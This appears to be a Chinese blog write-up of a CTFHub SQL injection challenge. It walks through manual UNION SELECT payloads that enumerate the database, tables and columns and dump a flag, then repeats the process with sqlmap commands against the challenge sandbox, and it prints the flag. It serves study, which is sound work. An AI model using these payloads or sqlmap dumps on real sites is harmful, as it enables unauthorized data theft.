CTFHub笔记之技能树WEB-字符型注入

已于 2022-03-24 23:33:34 修改
阅读量351 收藏 1
点赞数
分类专栏: CTF SQL注入 文章标签: web安全
于 2022-03-19 16:51:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48799157/article/details/123597932
版权
"本文详细介绍了两种方法来解决一个SQL注入问题。首先,通过手动构造SQL查询,逐步揭示数据库信息,包括数据库名、表名、列名,并最终获取到flag。然后,使用自动化工具sqlmap进行扫描,同样揭示数据库、表、列,并提取出flag。通过这两种方式,成功获取CTF挑战的flag:ctfhub{d53cb574dc4425ec5f74aae1}
摘要由CSDN通过智能技术生成

 小白一个,如有错误还请各位大佬指正!

解法一:手搓

1.输入1和2都有回显,3没有回显,得知数据库只有两个字段。开始构造payload,暴个数据库看看

123' union select 1,database()#

2.发现目标 爆个表名看看

123' union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'sqli' #'

3.发现名为flag的表 冲啦兄弟们

123' union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'#

 4.发现falg表的字段只有flag  很明显flag就在在这里啦

123' union select 1,flag from sqli.flag #

5.拿到 ctfhub{d53cb574dc4425ec5f74aae1}

解法二:sqlmap

1.打开sqlmap 扫一波

sqlmap -u http://challenge-7b5f5e4499b0bc97.sandbox.ctfhub.com:10800/?id=1

 2.有说法 爆数据库

sqlmap -u http://challenge-7b5f5e4499b0bc97.sandbox.ctfhub.com:10800/?id=1 --dbs

3.发现目标  爆表名

sqlmap -u http://challenge-7b5f5e4499b0bc97.sandbox.ctfhub.com:10800/?id=1 --D sqli --tables

4.看到flag表了  爆字段

sqlmap -u http://challenge-7b5f5e4499b0bc97.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns

5.最后一步 爆字段内容

sqlmap -u http://challenge-7b5f5e4499b0bc97.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump

 成功拿到flag!

weixin_48799157
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BEAWebLogicWorkshop使用笔记之三--Web应用篇
03-03
什么是PageFlowPageFlow是一个基于Struts1.1的web应用编程模,替代了早期Portal产品中的webflow,不再属于Portal专有,用以实现web应用中用户界面、业务逻辑、导航控制的分离,并且大大简化了WEB应用的开发过程,...
CTF Web学习笔记
01-11
### CTF Web学习笔记知识点详解 #### 杂项部分 **1. 隐写术** 隐写术是一种将信息隐藏于其他非秘密数据之中的技术,这种技术通常用于隐蔽通信或数据保护。在CTF竞赛中,经常出现的情况是将flag隐藏在图像、音频...
CTFhub 字符注入
plant1234的博客
06-16 521
字符注入: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata s
CTFHub技能树-Web-SQL注入-字符注入
qq_46222050的博客
09-02 528
这个题目我使用的sqlmap做的,需要python环境的支持。 sqlmap安装教程,点击跳转。 1.我们打开环境。 2.使用sqlmap获取当前网站数据库的名称 sqlmap.py -u "http://challenge-360c6b5a7e81662d.sandbox.ctfhub.com:10080/b.com:10080/?id=1" --current-db 3.获取sqli数据库中的表名 发现flag表 4.获取flag表中的字段名 发现flag字段 5.获取flag字段的内容 得到f
CTFHub:web前置技能-SQL注入-字符注入
wdnmddbl的博客
06-12 1116
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:链接:我是一个知识点链接:我是一个知识点链接:我是一个知识点链接:sqlmap下载点我文章总结有我个人总结的一些知识点,希望对你有所帮助。练习sql注入,推荐使用sql-labs这个靶场,我后续也会更新从开始搭建到攻略1-75关完整教程,早些关注上车哦。大概思路和涉及的知识点sql注入基本语句和手工注入流程:#,–+,-- -代表后边忽略,常用与闭合思路:字符注入点网页链接有类似的结构。
CTFHUB——字符注入
陈艺秋的博客
01-14 443
sql整数注入
CTFHub字符注入
sGanYu
07-24 3120
目录 手动注入 sqlmap注入 手动注入 注入是否为字符注入,在输入id=1的时候发现输出结果为id=’1’,判断类字符串形 需要让语句闭合,正常执行,在url结尾输入%23 或者--+,正常闭合,%23为#,注释后面的语句,一定要注意“ ' ”英文输入下,否则容易爆错 判断列数,发现是两列 库名为sqli 爆出一个news和flag两个表,开始跑列名 列名为flag ,查询列内容 【 Mysql表类:在mysql内自带一个数据库,名...
CTFHub - 字符注入
Have_a_great_day的博客
09-08 489
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
java笔记 Java-Web笔记 J2EE三大框架笔记
10-19
Java-Web笔记和J2EE三大框架笔记是学习Java Web开发的关键资料,这些笔记涵盖了从基础到高级的诸多知识点,旨在帮助开发者掌握Java在Web环境中的应用。 首先,Java笔记主要涉及Java语言的基础语法、面向对象编程...
ctf笔记 杂项 web 密码学基础笔记
最新发布
07-05
### CTF笔记:杂项、Web与密码学基础 #### 一、文件处理技术 **1.1 文件分离** 在CTF竞赛中,文件分离是一项常见的技能,用于从复合文件中提取有用的数据。 - **Binwalk**: 是一个强大的工具,可以用来识别文件...
CTFHUB 字符注入
qq_63875498的博客
12-04 200
CTFHUB 字符注入
CTFHub-字符注入
m0_51589948的博客
05-19 240
字符注入 输入1,2,3 发现只有1,2回显,证明是一个两行的数据库 输入1 order 2 查询字段数 使用整形注入后发现,无法注入成功,考虑字符注入, 可得知数据库名为sqli 查询该数据库下的表名 -1‘ union select 1,group_concat(table_name) from information_schema.table where table_schema=‘sqli’# 得出表名有新闻和标志 查询flag的所有字段名 -1’ union s
CTFHub | 字符注入
尼泊罗河伯的博客
10-27 1523
此题目和上一题相似,一个是整数注入,一个是字符注入字符注入就是注入字符串参数,判断回显是否存在注入漏洞。因为上一题使用手工注入查看题目 flag ,这里就不在使用手工注入,而是使用 sqlmap 工具完成。
CTFHUB--技能树SQL注入{字符注入}
lulu001128的博客
12-03 833
CTFHUB--技能树SQL注入{字符注入}解题过程
CTFHub 字符SQL注入
Leon~博客
03-14 3994
字符SQL注入 目录 一、判断是否存在注入 二、判断select语句中有几列 三、判断显示的信息是第几列的信息 四、利用函数来收集数据库信息 五、通过union查询数据库 1、获取所有数据库名称 2、查询数据库中有多少个表 3、查询指定数据库中的表名 4、查询指定数据库指定表中的列名 5、查询指定...
CTFHUB-WEB-字符SQL注入
xixihahawuwu的博客
12-24 330
CTFHUB-WEB-字符SQL注入 我们先就这此题来了解下如何去判断是否是字符注入 如何去判断 1.加单引号,由于固定情况下,数据库此时的语句为select * from table where name = ‘admin’ ,加入单引号会引起报错,页面不回返 id=1' 2.加入 ?id=1' and 1=1 这里就需要加注释来进行绕过 一开始我想使用#来进行注释,结果发现被网页转码了,我们换一种注释–,为了防止再次被转码,我们在–后面加上+ id=1' and 1=1--+ 3.输入 id=
CTFHub-字符注入-wp
z1moq的博客
05-09 183
字符注入 输入1 数据正常返回 输入1+1 ​ 仍返回 ID=1 的值,说明不存在整数SQL注入漏洞 输入 ' or 1=1 # 能正常返回 ​ 所以存在以单引号闭合的字符注入 输入 1' order by 1 # 1' order by 2 # 1' order by 3 # 在值为3时无法正常显示页面 所以页面显示输出字段数为2 输入 -1' union select 1,database() # 获取数据库名 继续输入 -1' union sel
CTFHub (web-SQL-字符注入)
m0_64444909的博客
04-29 2592
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 阅读目录一、limit和group_concat查询的区别二、对字符数据的解释三、实战解题步骤1.进入靶场, 一、limit和group_concat查询的区别 1.列出所有数据库 limit 一个一个打印出来库名 group_concat 一次性全部显示 2.列出(数据库: )中所有的表名 limit 一个一个打印出来表名 group_concat 一次性全部显示 3.列出(数据库: 表:)中所有的字段名 limit 一个.
CTFHub技能树web(持续更新)--SQL注入--字符注入
jiuyongpinyin的博客
08-12 444
字符注入 这道题和上一道基本一样,而且很简单,因为是有回显的,知道是拿什么字符包裹的语句,就知道拿什么字符使语句闭合,例如这道题: 我们截断语句之后,回显发现是使用单引号包裹的语句,所以我们使用单引号来使语句闭合,使用order by 语句来查列: ?id=1' order by 2 --+ 查看是否可以使用联合查询语句: ?id=111' union select 1,2 --+ 查看数据库: ?id=111' union select 1,database()--+ 查看列: ?id=
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值